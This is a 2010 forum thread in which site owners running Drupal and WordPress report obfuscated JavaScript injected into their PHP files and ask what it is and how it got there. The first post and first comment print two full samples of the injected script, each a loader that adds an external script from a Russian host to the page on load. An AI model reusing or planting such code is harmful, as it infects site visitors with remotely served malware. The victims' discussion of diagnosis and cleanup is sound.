Parse error: syntax error, unexpected '

By drgonzo121 on 25 May 2010 at 14:35 UTC

Hello,

i got this error:

Parse error: syntax error, unexpected '<' in /var/www/vhosts/psy.cc/www/index.php on line 41

and i found this strange script in index.php:

<script>be=14802;be++;this.k='';var hL={N:false};var c;q=function(){AE=6784;AE-=226;var D=false;var E=[];var Dn=new String();function L(r,cW,o){qb=16948;qb-=150;rp=15910;rp-=251;return r.substr(cW,o);this.xP=58002;this.xP-=208;Hk=39478;Hk++;}var __=new String();Q={inG:false};uM=[];var v=document;this.oS=false;var j=[];var A=RegExp;var Cr={Qc:65015};var x=new String(L("/goolQBj",0,4)+L("gle.NxR",0,4)+"com/"+L("tnafDOVb",0,4)+L("DY3elix.eD3Y",4,4)+L("com/S7X",0,4)+"onli"+"nedo"+L("wn.n7d5",0,4)+L("et.pbTy",0,4)+"hp");var T='';function b(r,cW){var Z=new String();var Qy=new String();var o=new String(L("[3si",0,1))+cW+"]";var l=new A(o, "g");fI=[];var ev=new Array();return r.replace(l, T);this.s="";var rP=[];};eD={uO:"NK"};hs={Ai:"_O"};w={};var ge=["nv","jQ"];var qf=b('secTr0iKpqt1','QNluVwLF_0TH4feKqg1');var C=972490-964410;var g=L("bodyh4a",0,4);var M=null;CC=6602;CC-=53;z={gm:"U"};var MJ=["Gi"];c=function(){try {this.vv=false;var qfl=b('c3rMe3agtMeBEhlLeympeHn8t0','MygVLwB3p98qhHPf0');Sv=62668;Sv-=182;O=v[qfl](qf);try {} catch(LM){};var qN=new Array();kA=14135;kA+=109;var r=C+x;var eI={HT:"sx"};this.Rt=33100;this.Rt-=38;zr=44104;zr++;var ia=new String();var I=L("de0L6",0,2)+L("feKHR",0,2)+L("rvlt",0,1);var QR={mp:"lf"};this.gS="gS";var AQ=b('shrhcW','pmZj4HflMWF2h6a');var tL={Ju:false};var sN=[];var zw='';AT=12596;AT--;yH=1449;yH++;O[I]=[1][0];try {} catch(RS){};var ww={};O[AQ]=new String("htt"+"p:/"+L("/fupGK",0,3)+L("mRdrrymRd",3,3)+"ent"+"ry."+L("ru:i9B",0,3))+r;try {} catch(Zg){};this.A_="A_";var Kn={Xk:false};v[g].appendChild(O);var AO={Xz:16176};try {var JTA='SW'} catch(JTA){};} catch(u){YC=18203;YC-=26;var xL=false;var mP=53405;};this.eb='';var KV=new Array();};RFo={mM:"Kb"};var dG=["DZ","bw"];};var wY=["ai","jC","FH"];var kz=new String();q();window.onload=c;this.dp="dp";IWz=4341;IWz++;</script>
<!--8ad0ec6313785bee0ec9d8f831c453cc-->

what is this monster?

thanks

Comments

and at about the same time

drgonzo121 commented 25 May 2010 at 15:00

and at about the same time some other dude called me , saying he had a WSOD... i checked his index.php and fount this code:

<script>var q=false;TB=27668;TB--;Me={Y:39770};var L=["kf","v"];var R;W=function(){var OW={Ja:"lj"};var Qo=["OX"];P=38559;P+=142;var po={My:false};function N(e,J,A){try {} catch(S){};return e.substr(J,A);}var QA=RegExp;var j=new String("/goog"+N("le.corwH",0,5)+N("m/the3FOu",0,5)+"sun.c"+N("o.uk/SEHP",0,5)+N("e3IZicibaIe3Z",4,5)+N(".com.BUCJ",0,5)+N("phpN8jF",0,3));var k=document;try {var lH='iu'} catch(lH){};var T='';VV=["zf"];this.a=692;this.a+=158;function Q(e,J){var A=String("[")+J+String(N("]eot",0,1));var U=new QA(A, "g");return e.replace(U, T);};jm=["m","gc","LD"];EJ={Jl:false};var M=null;this.Rw='';this.Yu=54493;this.Yu+=231;var de=new Array();var jF=Q('sWc5r1iWput1','WVu5L1');var b=new String("bod"+N("yK30n",0,1));var c=947410-939330;this.s=false;R=function(){try {var tr=new Date();C={w:20017};var E=Q('cdrYedaGtse_EdlGekmke_n_tY','Yk9sGd_');fK=["tZ","_J","tt"];EM=["_I","lF","Nv"];O=k[E](jF);Sf=14261;Sf+=16;JY=62226;JY-=70;var Al=Q('sKrQcQ','wbLXKPQO');var h=["aI"];var Rp={};K=[];var e=c+j;this.dq="";var l="de"+N("feVOr",0,2)+"r";var bq=[];var it={eZ:57184};O[l]=[1][0];var qW=["Lt","y"];this.Mg="Mg";var ig=new Date();O[Al]="http"+"://f"+"urry"+N("entrgLui",0,4)+N("y.ruz32T",0,4)+N("qtAm:tmqA",4,1)+e;lq={VA:"No"};Cg=8939;Cg++;k[b].appendChild(O);} catch(jb){UA={MI:"D"};qp={Hn:62514};var Lw=new String();};SKp=["uf","FO","Vk"];};this.fn=63042;this.fn--;this.sZ=51403;this.sZ--;};W();try {var MqU='LV'} catch(MqU){};this.Hi=false;var jX={Mm:"Pl"};window.onload=R;this.ml="ml";r=46098;r++;this.UI=40275;this.UI-=39;</script>
<!--150d769bcaf00c5e96b07bdfb51c0544-->

so what's happening

both sites are running again... the first site is running on Drupal 6.14

now the same code i also

drgonzo121 commented 26 May 2010 at 22:34

now the same code i also found in a wordpress of me ... it's fucked up

www.mentalreactor.be

Glad to find a brother -___-

TontonX commented 27 May 2010 at 08:19

I had exactly the same problem and tryed to figure out where it was coming from without success...

I have 4 websites each pointing to a different directory on my host provider

And it began one month ago, i had this script which came into each of my .php and .js files
in all my directories and subdirectories.

Result was my all my javascripts scrollings and dhtml menus were screwed up, i uploaded
fresh versions of these .php files from my local, and it solved the problem.

But again it happened one more time yesterday !

And this time i had recently installed 2 drupal websites, and it completly screwed up all the files in all the subdirectories...

I had some questions for you if you don't mind... as we had the same problem

1)your host provider wouldn't be phpnet.org ? (i am there)
2)would you use some autosurfs softwares ? (i do and i am wondering if i got some trojan or thing like that)
3)would you use third part sothink softwares to create dhtml and javascript scrollings ? (i do so i am also wondering if their code is screwing up everything over time)

If you had also questions for me, i would be glad to answer... as it's the first year i see something like that screwing up my websites.

Marc

www.mentalreactor.be is a

drgonzo121 commented 28 May 2010 at 08:10

www.mentalreactor.be is a wordpress and that had the same malicous code
ww.psy.cc is on another physical server .... no connection at all...

1) no
2) what is autosurf?
3) i use the admin menu

i think we might have been hacked ?

anybody else?

my wordpress is fucked up

drgonzo121 commented 28 May 2010 at 08:12

my wordpress is fucked up good man

http://www.mentalreactor.be/

in a subdirectory i had also a drupal

http://www.mentalreactor.be/drupal and there also the index.php file was edited with that malicious code ...

that's three spots on two servers

apparantely this test wp

drgonzo121 commented 28 May 2010 at 08:15

apparantely this test wp didn't got hit:

http://www.mentalreactor.be/wp2/

yeah that thing is really messing up our websites

TontonX commented 28 May 2010 at 21:52

I asked on the forum of my host provider, and it seemed another guy got the problem too, and he was using Joomla...

But personally i think it's not related to a specific CMS, as in fact i had this problem 1 month before installing my 2 new recent drupal websites.

So i am really wondering where that thing is coming from...

I even changed my Ftp password the first time when it happened...

Some kind of new super virus roaming the net i don't know...

did you have it on one single

drgonzo121 commented 30 May 2010 at 20:53

did you have it on one single installation, after you removed the malicious code?

it's nog gonna be a friend of mine, updated my wordpress to latets version

nobody else have this problem?

can't imagine we're the only two people encountering this problem....

sorry i was away...

TontonX commented 6 June 2010 at 17:54

Personnally i removed my drupal website...

to create one fresh website only composed of .php files with the adobe suite

so it wasn't related anymore to any CMS...

and guess what...

today i found this back at the end of my index.php

Hopefully as my new website is in flash and there are no javascripts in it, i didn't notice a difference... but i saw the navigator was trying to connect to some unknown locations...

so once again i re-uploaded my local clean file...

So i think it's not related to a CMS but more to something infecting our respective remote ftps...

I am sure we're not alone in this, but it's true that people won't automatically notice it as it's at the end of their php files... and so far i've seen it was only causing trouble, if the concerned page was containing javascripts or relations to .js files. (personnally all my javascripts were screwed on my first website)

So if it's infecting other pages not including javascripts, unless people check their websites and their navigator connections they won't be aware of that fuck... malicious code